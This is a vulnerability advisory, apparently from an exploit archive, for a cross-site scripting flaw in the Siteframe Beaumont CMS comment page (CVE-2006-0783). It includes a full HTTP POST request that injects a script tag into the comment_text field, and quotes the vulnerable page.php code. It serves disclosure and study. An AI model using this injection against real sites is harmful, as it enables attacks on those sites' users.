Siteframe Beaumont 5.0.2 <== User Comment Cross-Site Scripting Vulnerability

2006.02.17

Credit: Kiki

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2006-0783

CWE: CWE-Other

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

Siteframe Beaumont 5.0.2 <== User Comment Cross-Site Scripting Vulnerability
####################################
Information of Software:
Software: Siteframe Beaumont 5.0.1a
Site: http://www.siteframe.org/
Description of software: Siteframe is a lightweight content-management
system designed for the rapid deployment of community-based websites.
With Siteframe,a group of users can share stories and photographs, create blogs,
send email to one another, and participate in group activities.
####################################
Bug:
Siteframe contains a flaw that allows a remote cross site scripting attack.
The vulnerability is found in the user comment page and the user can modify
the function GET and insert the XSS code
- http POST request
http://[target]/edit/Comment
POST /edit/Comment HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
n;q=0.8,image/png,*/*;q=0.5
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 167
comment_id=&comment_user_id=554&comment_page_id=116&comment_reply_to=&co
mment_subject=Kiki&comment_text=Hi&_submitted=1
but we can modify the request POST in this way:
comment_id=&comment_user_id=554&comment_page_id=116&comment_reply_to=&co
mment_subject=Kiki&comment_text=<script>alert("lol");</script>&_submitte
d=1
---------------------------------------------------------
Example:
you can insert in the text post an XSS code or you can modify the request in this way:
comment_id=&comment_user_id=554&comment_page_id=116&comment_reply_to=&co
mment_subject=Kiki&comment_text=[XSS]&_submitted=1
---------------------------------------------------------
The bug is in this part of page.php
[...]
// get the comments
if ($p->get('allow_comments')) // are comments allowed?
{
// display comments
if (config('threaded_comments'))
$clist = $p->get_threaded_comments();
else
$clist = $p->get_comments();
$PAGE->assign('comments', $clist);
$PAGE->assign('num_comments', count($clist));
// now, create a comment form
$c = new Comment;
$c->set('comment_page_id', $p->id());
$PAGE->assign('comment_form', $c->form());
}
[...]
####################################
Credit:
Author: Kiki
e-mail: federico.sana (at) alice (dot) it [email concealed]
web page: http://kiki91.altervista.org
####################################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Siteframe Beaumont 5.0.2 <== User Comment Cross-Site Scripting Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.